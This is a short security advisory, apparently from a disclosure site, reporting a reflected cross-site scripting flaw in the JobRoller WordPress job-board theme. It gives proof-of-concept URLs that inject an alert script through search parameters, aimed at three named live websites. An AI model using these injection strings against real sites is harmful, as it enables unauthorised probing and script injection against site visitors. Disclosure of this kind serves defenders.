WordPress jobroller Reflected XSS

2013.06.11

Credit: Infern0_

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Reflected XSS at jobroller - job board for Wordpress
#Vendor: appthemes.com/themes/jobroller/
#Type of report: Full Disclosure(vendor informed at the same time)
Example PoC:
www.nextjobfind.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'">
pracait.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'">
myworknet.com/wp/?s=tester&location=%27%22%3E&ptype=job_listing&latitude=%27%22%3E&longitude=%27%22%3E&full_address=%27%22%3E%3Cscript%3Ealert%28%22Infern0_%22%29%3C/script%3E&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5%27%22%3E
Versions <=1.6.3 seems to be affected(last link)
<=1.5.1 sure are affected.
Regards,
Dawid `Infern0_` Balut

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress jobroller Reflected XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.